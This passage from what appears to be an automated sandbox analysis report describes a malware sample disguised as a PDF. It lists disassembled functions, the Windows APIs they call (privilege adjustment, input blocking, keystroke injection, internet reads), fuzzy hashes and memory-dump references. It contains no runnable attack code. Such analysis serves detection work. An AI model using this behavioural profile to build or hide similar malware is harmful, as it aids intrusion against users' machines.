                                                    • Opcode Fuzzy Hash: 242b67ade364af05e99b7da00b41925a26dd2117e0b8b70efc69abe2101504af
                                                    • Instruction Fuzzy Hash: D372BC31E042089FCF16DF94C481EAEB7B5EF48345F15806AED09AF6A1D730AE49CB91
                                                    Function 0035B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 0035B22F
                                                      • Part of subcall function 0035B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0035B5A5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Proc$LongWindow
                                                    • String ID:
                                                    • API String ID: 2749884682-0
                                                    • Opcode ID: b457d04d4561c5720f695212eb99c867cf91832c2f2d29306ad3c78df80dfd2a
                                                    • Instruction ID: feda2bfcc857351bb1baf153f799470235cbaaba1caa10447ac277056fd96716
                                                    • Opcode Fuzzy Hash: b457d04d4561c5720f695212eb99c867cf91832c2f2d29306ad3c78df80dfd2a
                                                    • Instruction Fuzzy Hash: 00A15B70114005BADB3B6F2E4C89EFFA95CEB4234AF11492DFD01EADB1CB259D099672
                                                    Function 00394EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003943BF,00000000), ref: 00394FA6
                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00394FD2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                    • String ID:
                                                    • API String ID: 599397726-0
                                                    • Opcode ID: 35b89d513804801de257d328f576835c11650694fed9dd463da815959761e9e8
                                                    • Instruction ID: 2dac383d3b9351cb3e78b6beaf96d6b865f354804ad279e64c166db48c920db1
                                                    • Opcode Fuzzy Hash: 35b89d513804801de257d328f576835c11650694fed9dd463da815959761e9e8
                                                    • Instruction Fuzzy Hash: 6541C77150460ABFEF239F94DC85EBFB7BCEB40754F10406EF606A6181EA719E4297A0
                                                    Function 003477B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \Q?
                                                    • API String ID: 4104443479-2401325038
                                                    • Opcode ID: 19e902b013831c5e59991c6e0cdd56531c821848313b734a27f56b123a878649
                                                    • Instruction ID: bf73d9f3df542fe61645aefd980ab387fabbe47d01d33d5e22e670c72516b2d4
                                                    • Opcode Fuzzy Hash: 19e902b013831c5e59991c6e0cdd56531c821848313b734a27f56b123a878649
                                                    • Instruction Fuzzy Hash: 77A23B74904219CFCB26CF58C880BADBBF5FF49314F2681A9D859AB391D734AE81DB50
                                                    Function 0038E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0038E20D
                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0038E267
                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0038E2B4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DiskFreeSpace
                                                    • String ID:
                                                    • API String ID: 1682464887-0
                                                    • Opcode ID: 0c77b25283b4a09881800f8a4f709dde2665ad2da8dcac3d99c4923676c72652
                                                    • Instruction ID: 4e72fb554b14474ad5eb9f14ccf74022327f422870c28e8a56450e8d49c21976
                                                    • Opcode Fuzzy Hash: 0c77b25283b4a09881800f8a4f709dde2665ad2da8dcac3d99c4923676c72652
                                                    • Instruction Fuzzy Hash: B5213135A00218DFDB01EF95D885EAEBBB8FF49310F1484A9E946EB261DB31A905CB50
                                                    Function 0037B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035F4EA: std::exception::exception.LIBCMT ref: 0035F51E
                                                      • Part of subcall function 0035F4EA: __CxxThrowException@8.LIBCMT ref: 0035F533
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0037B180
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0037B1AD
                                                    • GetLastError.KERNEL32 ref: 0037B1BA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1922334811-0
                                                    • Opcode ID: 61afc98b980a17b0463f8987294feebf6b21ec8ac0cd2c1a024a1094a0181f76
                                                    • Instruction ID: 915be22b454caaad652f85f940d69bc3d82305f5284ae58f3120ccb501087e5a
                                                    • Opcode Fuzzy Hash: 61afc98b980a17b0463f8987294feebf6b21ec8ac0cd2c1a024a1094a0181f76
                                                    • Instruction Fuzzy Hash: 7F11CEB2400204AFE729AF68DCC5D2BB7BCFB44310B20852EF45A97650EB74FC418B60
                                                    Function 00386606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00386623
                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00386664
                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0038666F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                    • String ID:
                                                    • API String ID: 33631002-0
                                                    • Opcode ID: 71387ca21d166dadfdea43f067ead5183e5402f9835da6b2dca13255933bfa09
                                                    • Instruction ID: 6bcd5af943c2f1051fb885492bceec41bffbf3da9c407505268529f9e9ba61ab
                                                    • Opcode Fuzzy Hash: 71387ca21d166dadfdea43f067ead5183e5402f9835da6b2dca13255933bfa09
                                                    • Instruction Fuzzy Hash: 5C111E71E01228BFDB119FA5DC45FAEBBBCEB85B10F104166F900E6290D7B05A058BA5
                                                    Function 003871FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00387223
                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0038723A
                                                    • FreeSid.ADVAPI32(?), ref: 0038724A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 88983a04af2fe873dc1c5521302bc129c35ef3b4e3f652a69a262d92abc7e284
                                                    • Instruction ID: c602cfd5944d227768445864c50f5a420866230c51cefedc715a79159464715c
                                                    • Opcode Fuzzy Hash: 88983a04af2fe873dc1c5521302bc129c35ef3b4e3f652a69a262d92abc7e284
                                                    • Instruction Fuzzy Hash: B3F0FF75904219BBDB05DBE8DD89EADBBBDEB08301F104469A502E2191E270A6458B10
                                                    Function 0038F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0038F599
                                                    • FindClose.KERNEL32(00000000), ref: 0038F5C9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: e8f4ca8b6861a889efc4f3a958ba4ae11a6a1020045cac01f84bcedebd1e4ab1
                                                    • Instruction ID: 56523cf24332ba623d7e39eb746d448078d0be5b039f793157fa5ee936579fc5
                                                    • Opcode Fuzzy Hash: e8f4ca8b6861a889efc4f3a958ba4ae11a6a1020045cac01f84bcedebd1e4ab1
                                                    • Instruction Fuzzy Hash: 4D11C4316002009FD711EF28D845E2EB3E8FF85325F04896EF8A6DB2A1CB30BD048B85
                                                    Function 0038CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0039BE6A,?,?,00000000,?), ref: 0038CEA7
                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0039BE6A,?,?,00000000,?), ref: 0038CEB9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: 93715c6d84ec722e39eda056c8674c57f79af7a301dc4c85420b04c9f1871501
                                                    • Instruction ID: 021cc91f8f168a9e5d2b19295ddc77d7f934a49d3dfa845ce86ab3f3384621a8
                                                    • Opcode Fuzzy Hash: 93715c6d84ec722e39eda056c8674c57f79af7a301dc4c85420b04c9f1871501
                                                    • Instruction Fuzzy Hash: 0DF08235111329ABDB11ABA4DC49FEA776DBF08351F008165F915E6181D770AA40CBA0
                                                    Function 0038411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00384153
                                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00384166
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: InputSendkeybd_event
                                                    • String ID:
                                                    • API String ID: 3536248340-0
                                                    • Opcode ID: 5321757cbb26d9fa35bacfcfe7a224c65cbbd9759f5b3c53d7db9180e870c366
                                                    • Instruction ID: 47ed2347eaffa4f778c14809b24d0e738507f819d67f3c4c6adb6ba6e25a6bce
                                                    • Opcode Fuzzy Hash: 5321757cbb26d9fa35bacfcfe7a224c65cbbd9759f5b3c53d7db9180e870c366
                                                    • Instruction Fuzzy Hash: B7F06D7090034EAFDB069FA0C809BBE7BB4EF00305F008059F96596191D77996129FA0
                                                    Function 0037AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0037ACC0), ref: 0037AB99
                                                    • CloseHandle.KERNEL32(?,?,0037ACC0), ref: 0037ABAB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                    • String ID:
                                                    • API String ID: 81990902-0
                                                    • Opcode ID: 48c6f1a0e2dbb0c1267d652847b77098c4d7d5f7a973791ccb2ad18cfe828b6b
                                                    • Instruction ID: 17cf7a4dbe3ab899857ab988496a5320d1a9bc942a3710a498397d28fc72923e
                                                    • Opcode Fuzzy Hash: 48c6f1a0e2dbb0c1267d652847b77098c4d7d5f7a973791ccb2ad18cfe828b6b
                                                    • Instruction Fuzzy Hash: C0E0B676000610AFE7262F64EC09D76BBADEB44321B208839B89A85870DB62AC949B50
                                                    Function 003681AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00366DB3,-0000031A,?,?,00000001), ref: 003681B1
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003681BA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: bf07bd30d489025e2ded1912705f8d9907c2083fa0641f8f7df2c8e97304e743
                                                    • Instruction ID: 969d538149f7b068e648568b120c08fa81f8ed6d7fec25e94e71d5536edabd24
                                                    • Opcode Fuzzy Hash: bf07bd30d489025e2ded1912705f8d9907c2083fa0641f8f7df2c8e97304e743
                                                    • Instruction Fuzzy Hash: FDB09236044648ABDB022BA1EC09F587F6CEB48752F014021F60D840618B7264108B92
                                                    Function 0036D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 17238fdfae74eda5e377931ce01843d7014da8985009bb3bba4c71b9e395c76f
                                                    • Instruction ID: 7d2041339b6130ab46d2423a81a97b2798cc00367e6a4459970336bc890d7014
                                                    • Opcode Fuzzy Hash: 17238fdfae74eda5e377931ce01843d7014da8985009bb3bba4c71b9e395c76f
                                                    • Instruction Fuzzy Hash: B4321422E29F414DD7239635D822336A39DAFB73D4F15D737E819B5DAAEB28C4835100
                                                    Function 003496C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __itow__swprintf
                                                    • String ID:
                                                    • API String ID: 674341424-0
                                                    • Opcode ID: 504b5a9cb68ec52cd10f507726a7f7be52ddcd04c5a6db324b18da63a798f282
                                                    • Instruction ID: bb636cf8f8b344cc7ec53c03fe010a45280503ee05f977fad47a70eaf7e128e2
                                                    • Opcode Fuzzy Hash: 504b5a9cb68ec52cd10f507726a7f7be52ddcd04c5a6db324b18da63a798f282
                                                    • Instruction Fuzzy Hash: 2A2298716183009FD726DF14C891BAFB7E8AF84314F11491EF99A9F2A1DB71E944CB82
                                                    Function 0037038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 766f83fbc61e1e641ac8a7d15449ea379c4f4bcfa2ff3e4fdc5b41657403f5e0
                                                    • Instruction ID: 99396e674043f32e5a52ed04dfa88bcd8956d7f5e39e697d5ca90434039069c0
                                                    • Opcode Fuzzy Hash: 766f83fbc61e1e641ac8a7d15449ea379c4f4bcfa2ff3e4fdc5b41657403f5e0
                                                    • Instruction Fuzzy Hash: ECB1CF20D2AF414DD62396399871336B75CAFBB3D6F92D71BFC2A74D62EB2185834180
                                                    Function 0038B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __time64.LIBCMT ref: 0038B6DF
                                                      • Part of subcall function 0036344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0038BDC3,00000000,?,?,?,?,0038BF70,00000000,?), ref: 00363453
                                                      • Part of subcall function 0036344A: __aulldiv.LIBCMT ref: 00363473
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                    • String ID:
                                                    • API String ID: 2893107130-0
                                                    • Opcode ID: 5672027a0014268e01c5e946c776db46ded3d6f50b1796672cc6ce2aca8e0141
                                                    • Instruction ID: d3e5b90961e1901f759e94eff278dbc957959addf64fe2b59bca7eb20307f237
                                                    • Opcode Fuzzy Hash: 5672027a0014268e01c5e946c776db46ded3d6f50b1796672cc6ce2aca8e0141
                                                    • Instruction Fuzzy Hash: 3121A2726346118BC72ACF28C481A52FBE5EB95311B248E7DE4E5CF2C0CB74B905CB54
                                                    Function 00396AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 00396ACA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    • Opcode ID: 01d7372ce15ac00d2f04cb6cb62b29ce4c9fa7928220f8c530be5163d9cc9b2d
                                                    • Instruction ID: 7281cde32ad78e31d045d7f07e3f12ba0205689d9765d77592aad4ce1af4082e
                                                    • Opcode Fuzzy Hash: 01d7372ce15ac00d2f04cb6cb62b29ce4c9fa7928220f8c530be5163d9cc9b2d
